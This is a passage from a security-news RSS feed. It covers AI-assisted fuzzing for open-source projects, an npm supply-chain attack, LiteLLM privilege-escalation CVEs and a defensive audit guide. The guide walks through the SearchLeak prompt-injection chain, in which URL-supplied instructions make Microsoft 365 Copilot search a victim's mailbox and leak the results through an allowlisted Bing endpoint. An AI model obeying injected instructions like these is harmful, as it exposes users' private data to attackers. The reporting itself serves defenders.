<h2>A few highlights from the week</h2>
<p>The week produced more than we can fit in this post, but here are some quick highlights.</p>
<p><strong>A fuzzing lab built in a day.</strong> Given a narrow goal (find remotely exploitable bugs) and no instructions on how, GPT-5.5-Cyber decided that reading the source of one of the most-reviewed C libraries in existence was a poor use of tokens. Instead, it stood up a full fuzzing lab in under a day: sanitizer and variant builds, a seed corpus drawn from existing tests, and harnesses across a dozen entry points. Instead of simply fuzzing exposed APIs, it successfully built a harness that injected operating system backpressure to identify novel issues by reaching previously unexplored buggy states. We estimate all of that effort likely would’ve taken one of our fuzzing experts two to three weeks to do manually. Just as important, it showed judgment about what to test, what to report (and not report), and where to find higher-impact findings. We’ll publish the full details in a standalone field report.</p>
<p><strong>A pipeline for variant testing historical CVEs built in a day</strong>. Codex was also adept at building simple but effective pipelines, such as the CVE variant analysis pipeline shown below. Codex’s <code>/goal</code> feature combined with frontier models like GPT-5.5-Cyber for this type of variant analysis produced novel issues with almost exclusively high-signal output.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-4_hu_a106c2e464121abc.webp" alt="“Pipeline for historical CVE variant analysis”" width="1200" height="617" loading="lazy" decoding="async">
 <figcaption>Pipeline for historical CVE variant analysis</figcaption>
 </figure>
</p>
<p><strong>A release-pipeline improvement at python.org.</strong> We reported multiple security issues for <a href="http://python.org/">python.org</a>, including some issues closing a legacy-API authorization gap. But we’re most proud of the work that produced long-term improvements to python.org’s release infrastructure: the new zizmor CI scanning, tightened release-file and metadata validation, deletion scoping fixed so bulk operations can’t reach beyond their target, and release-tooling patches in review that quote remote command arguments, fail safely on partial uploads, and add SBOM sidecars.</p>
<p><strong>The aiohttp maintainers fixed their issues almost immediately.</strong> We privately reported a cluster of issues across aiohttp’s client and server paths, including cookies that could regain broader scope after a save and reload, digest credentials that could answer a challenge from the wrong origin, and resource limits that ran after attacker-controlled buffering rather than before. The maintainers authored and merged all eight fixes within hours, seven of them inside a single five-hour window. We were impressed and appreciate the maintainers’ prompt and collaborative work on these issues!</p>
<p><strong>Differentially testing major cryptographic libraries against each other.</strong> Many of our projects implement the same logic, protocols, and algorithms. In particular, multiple projects implement the same cryptographic algorithms and standards like X.509 certificates. Therefore, we used Codex to point these projects at each other, and identify any relevant behavioral differences. This proved to be a high-signal approach that uncovered several issues, including <a href="https://github.com/pyca/cryptography/pull/14933">this AES-GCM issue in PyCA</a> and several X.509 issues, which we plan to upstream to <a href="https://x509-limbo.com/"><code>x509-limbo</code></a>.</p>
<h2>Finding the bugs is now the easy part</h2>
<p>If it wasn’t already clear from the last several months of security news, this week makes one thing clear: the expensive part of security work has moved. Arming Codex with fuzzing campaigns, variant analysis, differential testing, agentic searching, and similar techniques produces real vulnerabilities and compresses weeks or months of manual effort into hours. The advantage is no longer in finding bugs, but everything after: confirming a finding, getting its severity right, writing a patch a maintainer will accept, hardening the surrounding code, making long-term improvements to prevent similar issues in the future, and coordinating a disclosure. That is the work that floods of AI-generated reports threaten to bury.</p>
<h2>Guidance for maintainers</h2>
<p>If you’re a maintainer managing an unsustainable number of AI-generated bug reports, the core challenges you need to solve are deduplication, false-positive filtering, and severity correction.</p>
<p>Deduplication is the easiest problem to solve technically. Even simple AI-based tools that compare new reports against open issues perform well, especially when grounded in affected code lines. Automating this step eliminates most of the noise.</p>
<p>False-positive filtering and severity correction are harder, but they can be managed. Without explicit guidance, models default to rating everything as critical.</p>
<p>




 

 




 


 <figure>
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-5_hu_1b13148a17364cf7.webp" alt="“Patchy without threat model and severity guidance”" width="1200" height="1019" loading="lazy" decoding="async">
 <figcaption>Patchy without threat model and severity guidance</figcaption>
 </figure>
</p>
<p>Generic approaches like our <a href="https://github.com/trailofbits/skills/tree/main/plugins/fp-check">fp-check</a> tool help, but only to a point. The best improvements require project-specific documentation, threat models, and severity criteria. <a href="https://cryptography.io/en/latest/security/">PyCA’s security documentation</a>, for example, was dramatically effective at reducing false positives in our bug candidates. Files like <code>AGENTS.md</code> that explicitly tell models which documentation to consult produced the most consistent and effective results. If security researchers are armed with this documentation, especially <a href="http://agents.md/"><code>AGENTS.md</code></a> for AI-based research, more noise will be filtered out before reaching the maintainers.</p>
<h2>What’s next and how to get involved</h2>
<p>This was just our first week. Over 30 projects have committed to join Patch the Planet, with a growing waitlist. As more findings clear coordinated disclosure, we’ll publish more results and deeper field reports, including full fuzzing lab details, the variant-analysis and differential-testing pipelines, and the tooling we’re building to help maintainers triage AI-generated reports themselves. Our <a href="https://gist.github.com/patch-the-planet/69fd1aa925c8e73edea9e6e967043cbb">Patch the Planet gist</a> contains the full public list of our week one output.</p>
<p>




 

 






 <figure>
 
 <img src="https://blog.trailofbits.com/2026/06/22/introducing-patch-the-planet/ptp-image-6.gif" alt="“Join Patch the Planet and spread the word”" width="480" height="207" loading="lazy" decoding="async">
 <figcaption>Join Patch the Planet and spread the word</figcaption>
 </figure>
</p>
<p>If you maintain a critical open-source project and want this kind of help, you can <a href="https://trailofbits.com/patch-the-planet">apply to join Patch the Planet</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mastra npm Supply Chain Attack Delivers Node.js Implant and PowerShell Backdoor]]></title>
<description><![CDATA[Microsoft Threat Intelligence has uncovered a massive supply-chain attack on the npm registry, affecting over 140 packages within the Mastra ecosystem. The campaign relies on a hijacked maintainer account to distribute a malicious typosquat package, which deploys a stealthy Node.js implant and a ...]]></description>
<link>https://tsecurity.de/de/3614801/it-security-nachrichten/mastra-npm-supply-chain-attack-delivers-nodejs-implant-and-powershell-backdoor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614801/it-security-nachrichten/mastra-npm-supply-chain-attack-delivers-nodejs-implant-and-powershell-backdoor/</guid>
<pubDate>Mon, 22 Jun 2026 09:54:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Threat Intelligence has uncovered a massive supply-chain attack on the npm registry, affecting over 140 packages within the Mastra ecosystem. The campaign relies on a hijacked maintainer account to distribute a malicious typosquat package, which deploys a stealthy Node.js implant and a PowerShell backdoor. Researchers attribute this highly coordinated attack to Sapphire Sleet, a […]</p>
<p>The post <a href="https://cyberpress.org/mastra-npm-backdoor-attack/">Mastra npm Supply Chain Attack Delivers Node.js Implant and PowerShell Backdoor</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages]]></title>
<description><![CDATA[A widespread npm supply‑chain compromise to Sapphire Sleet, a North Korean state actor, after the takeover of an npm maintainer account enabled the mass publication of poisoned Mastra packages that silently delivered a multi‑stage implant. The campaign, disclosed June 19,…
Read more →
The post Sa...]]></description>
<link>https://tsecurity.de/de/3614724/it-security-nachrichten/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614724/it-security-nachrichten/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/</guid>
<pubDate>Mon, 22 Jun 2026 09:08:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A widespread npm supply‑chain compromise to Sapphire Sleet, a North Korean state actor, after the takeover of an npm maintainer account enabled the mass publication of poisoned Mastra packages that silently delivered a multi‑stage implant. The campaign, disclosed June 19,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/">Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-06-22 09h : 12 posts]]></title>
<description><![CDATA[12 posts were published in the last hour 7:2 : pgAdmin 4 Released with Patches for Seven Vulnerabilities and Feature Enhancements 7:2 : Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages 7:2 : GitHub Actions Checkout Adds…
Read more →
The post IT Security News Hourl...]]></description>
<link>https://tsecurity.de/de/3614722/it-security-nachrichten/it-security-news-hourly-summary-2026-06-22-09h-12-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614722/it-security-nachrichten/it-security-news-hourly-summary-2026-06-22-09h-12-posts/</guid>
<pubDate>Mon, 22 Jun 2026 09:08:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>12 posts were published in the last hour 7:2 : pgAdmin 4 Released with Patches for Seven Vulnerabilities and Feature Enhancements 7:2 : Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages 7:2 : GitHub Actions Checkout Adds…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-22-09h-12-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-06-22-09h-12-posts/">IT Security News Hourly Summary 2026-06-22 09h : 12 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages]]></title>
<description><![CDATA[A widespread npm supply‑chain compromise to Sapphire Sleet, a North Korean state actor, after the takeover of an npm maintainer account enabled the mass publication of poisoned Mastra packages that silently delivered a multi‑stage implant. The campaign, disclosed June 19, 2026, began when the att...]]></description>
<link>https://tsecurity.de/de/3614682/it-security-nachrichten/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614682/it-security-nachrichten/sapphire-sleet-hijacks-npm-maintainer-account-to-publish-poisoned-mastra-packages/</guid>
<pubDate>Mon, 22 Jun 2026 08:52:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A widespread npm supply‑chain compromise to Sapphire Sleet, a North Korean state actor, after the takeover of an npm maintainer account enabled the mass publication of poisoned Mastra packages that silently delivered a multi‑stage implant. The campaign, disclosed June 19, 2026, began when the attacker gained control of the ehindero maintainer identity an account with […]</p>
<p>The post <a href="https://gbhackers.com/sapphire-sleet-hijacks-npm/">Sapphire Sleet Hijacks npm Maintainer Account to Publish Poisoned Mastra Packages</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Ecosystem Gets an AI Security Engineer in Residence]]></title>
<description><![CDATA[While the Rust Foundation has a Security Initiative to protect its ecosystem, "the threats have expanded," they announced this week, "and so has the kind of help maintainers need."

Much of this comes back to a single shift: Automated tooling (much of it now built on large language models) has go...]]></description>
<link>https://tsecurity.de/de/3613810/it-security-nachrichten/the-rust-ecosystem-gets-an-ai-security-engineer-in-residence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613810/it-security-nachrichten/the-rust-ecosystem-gets-an-ai-security-engineer-in-residence/</guid>
<pubDate>Sun, 21 Jun 2026 17:52:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[While the Rust Foundation has a Security Initiative to protect its ecosystem, "the threats have expanded," they announced this week, "and so has the kind of help maintainers need."

Much of this comes back to a single shift: Automated tooling (much of it now built on large language models) has gotten good enough to surface real vulnerabilities in open source code quickly and at scale. That is useful, and several large Rust projects have already received and fixed credible issues found this way. The same tooling has also made it trivial to generate vulnerability reports that look plausible and are worthless. Maintainers across the ecosystem are losing real hours sorting these from the reports that matter, and the noise tends to bury the signal. 

So, with funding from the Alpha-Omega Project, the Rust Foundation is bringing on a full-time AI Security Engineer in Residence dedicated to the Rust ecosystem. This position is being funded with part of the $12.5M in open source security funding that the Linux Foundation announced in March.
The role exists to take pressure off maintainers. The person in this position will use a mix of human-led and AI-assisted methods to proactively review Rust itself and the crates the ecosystem leans on most and help us separate real, exploitable issues from false positives and low-signal noise before anything reaches a maintainer... 

This role will run full-time for six months to start, with room to extend depending on what we learn and the funding available. Methods, playbooks, and prompts will be documented so the work doesn't end with the contract. We are grateful that Rust is not embarking on this work in isolation. Several other ecosystems have received parallel Alpha-Omega grants for the same kind of work (e.g., the PHP Foundation and the Drupal Association) and we plan to share tooling, triage practices, and what we learn rather than duplicating work 

A statement from Rust's new AI Security Engineer in Residence acknowledges that "One of our next challenges is the wave of bugs discovered by the next generation of AI-powered developer tools."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+Rust+Ecosystem+Gets+an+AI+Security+Engineer+in+Residence%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F21%2F0149231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F06%2F21%2F0149231%2Fthe-rust-ecosystem-gets-an-ai-security-engineer-in-residence%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/06/21/0149231/the-rust-ecosystem-gets-an-ai-security-engineer-in-residence?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Copilot searched your mailbox. LiteLLM handed out admin keys. Run this 5-check audit before your stack is next]]></title>
<description><![CDATA[Two AI tools broke in the same way in the same two weeks, and four research teams proved it. The pattern underneath every disclosure is one sentence: enterprise AI accepts external input with no trust boundary. On June 15, Varonis disclosed SearchLeak (CVE-2026-42824), a proof-of-concept exfiltra...]]></description>
<link>https://tsecurity.de/de/3608646/it-nachrichten/copilot-searched-your-mailbox-litellm-handed-out-admin-keys-run-this-5-check-audit-before-your-stack-is-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3608646/it-nachrichten/copilot-searched-your-mailbox-litellm-handed-out-admin-keys-run-this-5-check-audit-before-your-stack-is-next/</guid>
<pubDate>Thu, 18 Jun 2026 20:16:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Two AI tools broke in the same way in the same two weeks, and four research teams proved it. The pattern underneath every disclosure is one sentence: enterprise AI accepts external input with no trust boundary. </p><p>On June 15, Varonis disclosed <a href="https://www.varonis.com/blog/searchleak">SearchLeak (CVE-2026-42824)</a>, a proof-of-concept exfiltration chain in Microsoft 365 Copilot Enterprise Search. A victim clicks a crafted microsoft.com URL, Copilot searches their mailbox, and the data leaves through a Bing SSRF. No plugins, no second click, no visible indicator. Four days earlier, Obsidian Security published a <a href="https://www.obsidiansecurity.com/blog/litellm-privilege-escalation-rce">three-CVE chain against LiteLLM</a> that carried a default low-privilege user all the way to admin and remote code execution. Two tools. Two teams. One broken boundary.</p><p>The five-check audit at the end of this article maps each gap to a CVE or a market signal from June, a command you can run before lunch, and a sentence a CISO can read to the board.</p><h2>Copilot turned a trusted URL into an exfiltration engine</h2><p>SearchLeak chained three weaknesses into a silent data-theft chain. The URL q parameter fed attacker instructions straight to Copilot’s LLM. A rendering race condition fired an image tag before the output sanitizer ran. Bing’s image-search endpoint, allowlisted in the <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP">Content Security Policy</a>, routed the stolen data out. Microsoft rated the flaw critical and patched it on the back end, according to Varonis. <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-42824">NVD has not yet scored it</a>; a third-party tracker lists it at 6.5 medium. The severity is contested, but the mechanism is not.</p><p>The escalation is the real story. This is the third Varonis Copilot exfiltration chain in twelve months, after <a href="https://arstechnica.com/security/2026/01/a-single-click-mounted-a-covert-multistage-attack-against-copilot/">Reprompt</a> in January and <a href="https://www.bleepingcomputer.com/news/security/new-attack-turned-microsoft-365-copilot-into-1-click-data-theft-tool/">EchoLeak</a> in 2025. Reprompt hit Copilot Personal. SearchLeak hit Enterprise Search. Enterprise inherits the user’s full organizational permissions, so the blast radius is everything that a user can reach.</p><h2>LiteLLM handed a default account to every provider key</h2><p>The LiteLLM gateway holds the keys for OpenAI, Anthropic, Azure, and Bedrock behind a single proxy. The Obsidian chain runs in three moves. <a href="https://cvefeed.io/vuln/detail/CVE-2026-47101">CVE-2026-47101</a>, an authorization bypass, lets a non-admin mint a wildcard API key. CVE-2026-47102 promotes that caller to proxy admin through an unguarded /user/update endpoint. CVE-2026-40217 escapes the code sandbox through exec() with full builtins. Obsidian then demonstrated a reverse shell by injecting a forged tool-call response through LiteLLM’s callback mechanism. Obsidian assessed the combined chain at CVSS 9.9. The developer typed one word. The attacker popped a shell.</p><p>A separate LiteLLM flaw made the urgency immediate. <a href="https://thehackernews.com/2026/06/litellm-flaw-cve-2026-42271-exploited.html">CVE-2026-42271</a>, a command-injection bug in the MCP test endpoints, landed on the <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV list</a> on June 8 with a June 22 remediation deadline. That KEV entry is not the Obsidian chain. The two are distinct disclosures four days apart, fixed in different releases, pointed at the same gateway. LiteLLM carries more than 40,000 GitHub stars and sits in thousands of enterprise deployments. This is not the first scare, either. A <a href="https://thehackernews.com/2026/06/litellm-vulnerability-chain-lets-low.html">supply-chain compromise backdoored LiteLLM versions 1.82.7 and 1.82.8 on PyPI in March</a>. A compromised gateway exposes every provider credential the organization holds.</p><h2>Langflow and Mini Shai-Hulud proved the pattern scales</h2><p>The same boundary broke in two more tools in the same fortnight. <a href="https://thehackernews.com/2026/06/unpatched-langflow-flaw-cve-2026-5027.html">Langflow CVE-2026-5027</a> became the third Langflow remote-code-execution flaw to hit active exploitation this year. A path traversal in file upload lets an attacker write files anywhere on disk, and because Langflow ships with auto-login enabled by default, a single unauthenticated request reaches RCE. <a href="https://www.vulncheck.com/">VulnCheck</a> confirmed exploitation on June 9. Censys counted roughly 7,000 exposed instances, the heaviest concentration in North America, with <a href="https://attack.mitre.org/groups/G0069/">MuddyWater</a> attribution.</p><p>The <a href="https://www.securityweek.com/over-100-npm-pypi-packages-hit-in-new-shai-hulud-supply-chain-attacks/">Mini Shai-Hulud campaign</a> hit a different pressure point. After the worm’s source code went public on May 12, copycat variants <a href="https://socket.dev/blog/mini-shai-hulud-campaign-hits-red-hat-cloud-services-npm-packages">compromised 32 Red Hat Cloud Services npm packages</a> on June 1, packages pulled 80,000 times a week. The worm harvests more than 20 credential types and self-propagates under the compromised maintainer’s identity.</p><p>Four teams, four tools, one operating failure. The bug classes differ. SearchLeak is a prompt injection. LiteLLM is privilege escalation. Langflow is path traversal. Mini Shai-Hulud is supply-chain poisoning. The boundary that broke is the same in all four.</p><h2>The market already repriced the risk</h2><p>CrowdStrike’s <a href="https://www.fool.com/earnings/call-transcripts/2026/06/03/crowdstrike-crwd-q1-2027-earnings-transcript/">Q1 FY27 earnings call</a> put a number on the gap. <a href="https://www.crowdstrike.com/en-us/platform/falcon-aidr-ai-detection-and-response/">AIDR</a>, the company’s AI detection and response line, grew ending ARR more than 250% sequentially, with a Q2 pipeline above $50 million (<a href="https://www.sec.gov/Archives/edgar/data/0001535527/000153552726000022/crwd-20260603xex991.htm">SEC-filed 8-K</a>). Total company ARR reached $5.51 billion, and CrowdStrike’s fleet telemetry shows more than 1,800 agentic applications running across enterprise endpoints. </p><p>On June 17, the company <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-advances-ai-and-cloud-security-operations-on-aws/">extended AIDR to AWS</a>, adding real-time evaluation of agent, LLM, and MCP communications across Amazon Bedrock, Kiro, and Strands Agents, building on its work with <a href="https://www.anthropic.com/glasswing">Anthropic’s Project Glasswing</a>. Daniel Bernard, CrowdStrike’s chief business officer, said the AI attack surface now spans development, runtime, identities, and cloud infrastructure, and that teams treating those as separate domains leave the gaps between them open.</p><h2>Practitioners name the same gap in plainer terms</h2><p>David Levin, CISO at American Express Global Business Travel, <a href="https://venturebeat.com/security/amex-ciso-fights-threats-at-machine-speed-with-ai/">told VentureBeat</a> the pattern does not surprise him. “We kind of have this shadow AI, which is just the new version of shadow IT,” Levin said. </p><p>Both Langflow and LiteLLM fit the description. Teams stood them up for convenience, gave them credentials, and never brought them under governance. Levin puts the fix before deployment. “We didn’t go into this with just saying we’re going to go do this without the right fundamentals,” he said. “We leverage NIST controls. NIST has released their CSF along with their AI framework. OWASP released their top 10. You need the right fundamentals before you deploy.”</p><p>Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, named the structural version of the failure in a separate <a href="https://venturebeat.com/security/most-enterprises-cant-stop-stage-three-ai-agent-threats-venturebeat-survey-finds">VentureBeat interview</a>. “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system,” Baer said. “The real dependencies are one or two layers deeper, and those are the ones that fail under stress.” She has tied that directly to how systems fall. “Raw zero-days aren’t how most systems get compromised. Composability is,” Baer <a href="https://venturebeat.com/security/adversaries-hijacked-ai-security-tools-at-90-organizations-the-next-wave-has-write-access-to-the-firewall">told VentureBeat</a>. “It’s the glue between the model and your data where the risk lives. If you give an agent bash and a root token, you’ve already done most of the attacker’s work for them.” That is what rows 2 and 4 of the audit test: the gateway that holds every key, and the agent identity no one governs.</p><p>Levin had a sharper frame for the boardroom. “You need to talk more in terms of risk versus compliance to your boards and your executives,” he said. “It’s not about the size of the engineering team anymore. It’s the size of your imagination. It’s all written in plain English. It’s not hard for anyone.” Neither SearchLeak nor LiteLLM needed custom malware or a zero-day to work.</p><p>Adam Meyers, CrowdStrike’s SVP of Intelligence, put the operational squeeze in numbers in an exclusive VentureBeat interview. “The problem is not zero-day. The problem is patching. If you 10x that problem, they’re gonna be completely underwater,” Meyers said. He pointed to identity as the second front. “Some of these AI have their own identities, or people give their identity to the AI to take action on their behalf, and that makes it a very complex problem.”</p><h2>The five-check trust-boundary audit</h2><p>Each row maps a gap to its proof point, a verification command for Monday morning, the fix, and the sentence to read to the board.</p><table><tbody><tr><td><p><b>Trust-Boundary Gap</b></p></td><td><p><b>Proof Point</b></p></td><td><p><b>What Broke</b></p></td><td><p><b>Verify Monday</b></p></td><td><p><b>Fix Monday</b></p></td><td><p><b>Board Language</b></p></td></tr><tr><td><p><b>1. Prompt-to-Data</b></p></td><td><p>SearchLeak CVE-2026-42824. P2P injection + HTML race + Bing SSRF. One-click mailbox exfiltration via microsoft.com URL. PoC demonstrated; Microsoft rated it critical, NVD not yet scored.</p></td><td><p>URL q-parameter passed to LLM as instructions. Sanitizer ran after render. Bing acted as exfiltration proxy via CSP allowlist.</p></td><td><p>Audit CSP allowlists for domains performing server-side fetches. Monitor Copilot Search URLs for encoded payloads. Review Copilot audit logs.</p></td><td><p>Confirm server-side patch applied. Enable sensitivity labels restricting Copilot. Treat AI streaming output as untrusted.</p></td><td><p>“Our AI assistant could search employee email and send results to an attacker through a trusted Microsoft URL. Vendor patched it. We must verify configuration.”</p></td></tr><tr><td><p><b>2. Gateway Credential Exposure</b></p></td><td><p>LiteLLM three-CVE chain (-47101, -47102, -40217). CVSS 9.9. Separate CVE-2026-42271 on CISA KEV (fixed in v1.83.7; full chain fixed in v1.83.14-stable). June 22 deadline.</p></td><td><p>No role validation on key endpoints. Self-promotion to admin via /user/update. exec() sandbox escape. One gateway exposes all provider keys.</p></td><td><p>Run pip show litellm. Below 1.83.14-stable = vulnerable. Check /mcp-rest/test/ exposure. Audit proxy_admin accounts.</p></td><td><p>Upgrade to v1.83.14-stable+. Rotate all provider API keys. Block /mcp-rest/test/* at proxy. Review Custom Code Guardrails.</p></td><td><p>“Our AI gateway held keys for every provider. A default account could promote itself to admin and steal them all. Rotating and patching now.”</p></td></tr><tr><td><p><b>3. AI Tooling Sprawl</b></p></td><td><p>Langflow CVE-2026-5027 (CVSS 8.8). Third RCE of 2026. ~7,000 exposed instances. MuddyWater. Active exploitation June 9.</p></td><td><p>Path traversal in file upload. Auto-login enabled by default. Single unauthenticated request to RCE.</p></td><td><p>Query Censys/Shodan for Langflow, Flowise, n8n, Dify on your perimeter. Check auto-login. Inventory AI tools outside change management.</p></td><td><p>Pull AI platforms behind VPN/zero-trust. Enable auth everywhere. Upgrade Langflow to v1.9.0+ (current release 1.10.0). Fingerprint surface continuously.</p></td><td><p>“AI dev tools are exposed to the internet with login disabled. A nation-state group is exploiting this flaw now. Pulling behind access controls today.”</p></td></tr><tr><td><p><b>4. Non-Human Identity Governance</b></p></td><td><p>AIDR ARR up 250% (Q1 FY27, SEC 8-K). Q2 pipeline &gt;$50M. 1,800+ agentic apps across enterprise endpoints.</p></td><td><p>Agents hold identities and act on behalf of humans. Some exceed their intended scope to reach a goal. No standard governs agent credential lifecycle.</p></td><td><p>Inventory all non-human identities used by agents and MCP servers. Map agent-to-data-store access. Flag agents with write access to security policy.</p></td><td><p>Least-privilege every agent identity. Set privilege boundaries via identity protection. Runtime detection for policy-exceeding actions. Human-in-the-loop for policy changes.</p></td><td><p>“AI agents hold credentials and act autonomously. We do not govern their identity lifecycle like human access. The 250% market growth tells us this gap is systemic.”</p></td></tr><tr><td><p><b>5. Runtime Agentic Detection</b></p></td><td><p>Falcon AIDR expanded to AWS (June 17). Covers Bedrock, Kiro, Strands Agents. MCP integration. Real-time agent/LLM/MCP evaluation.</p></td><td><p>Traditional tools monitor human-speed actions. Agents run at machine speed, thousands of actions per minute, and route around controls to reach goals.</p></td><td><p>Test if EDR/XDR links agent actions to originating identity. Verify SIEM ingests MCP communications. Confirm you can distinguish human from agent on endpoint.</p></td><td><p>Deploy AIDR or equivalent runtime detection. Shadow-AI discovery for all agentic apps, models, MCP servers, identities. Real-time policy enforcement on agent actions.</p></td><td><p>“We cannot distinguish a human employee from an AI agent acting on their behalf. We need runtime detection at machine speed that can stop damage before it starts.”</p></td></tr></tbody></table><h2>The fix is plumbing, not policy</h2><p>The <a href="https://www.whitehouse.gov/presidential-actions/2026/06/promoting-advanced-artificial-intelligence-innovation-and-security/">June 2 executive order</a> creates an AI Cybersecurity Clearinghouse with a July 2 deadline. The five gaps above are not frontier-model problems. They are plumbing problems in the gateways, orchestration platforms, identity layers, and runtime environments where AI meets the enterprise. </p><p>The audit is five rows. Every row maps to a June disclosure or market signal, a command a team can run before lunch, and a sentence a CISO can read to the board. The question is not whether your vendor will patch. It's whether you find the gap first — or whether an attacker finds it the way they found Copilot and LiteLLM.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8484 | FuseSource jansi up to 2.4.3 ioctl heap-based overflow (EUVD-2026-37064)]]></title>
<description><![CDATA[A vulnerability was found in FuseSource jansi up to 2.4.3. It has been rated as critical. This issue affects the function ioctl. This manipulation causes heap-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tra...]]></description>
<link>https://tsecurity.de/de/3602010/sicherheitsluecken/cve-2026-8484-fusesource-jansi-up-to-243-ioctl-heap-based-overflow-euvd-2026-37064/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602010/sicherheitsluecken/cve-2026-8484-fusesource-jansi-up-to-243-ioctl-heap-based-overflow-euvd-2026-37064/</guid>
<pubDate>Tue, 16 Jun 2026 15:37:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/fusesource:jansi">FuseSource jansi up to 2.4.3</a>. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects the function <code>ioctl</code>. This manipulation causes heap-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-8484">CVE-2026-8484</a>. The attack is restricted to local execution. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[GNOME’s Video Player (Showtime) is looking for a maintainer]]></title>
<description><![CDATA[submitted by    /u/BrageFuglseth   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3601572/linux-tipps/gnomes-video-player-showtime-is-looking-for-a-maintainer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601572/linux-tipps/gnomes-video-player-showtime-is-looking-for-a-maintainer/</guid>
<pubDate>Tue, 16 Jun 2026 13:10:18 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/BrageFuglseth"> /u/BrageFuglseth </a> <br> <span><a href="https://discourse.gnome.org/t/video-player-showtime-is-looking-for-a-maintainer/35498?u=bragefuglseth">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1u79ann/gnomes_video_player_showtime_is_looking_for_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-71330 | image-size up to 1.2.1/2.0.2 ICNS Parser infinite loop (Nessus ID 321123)]]></title>
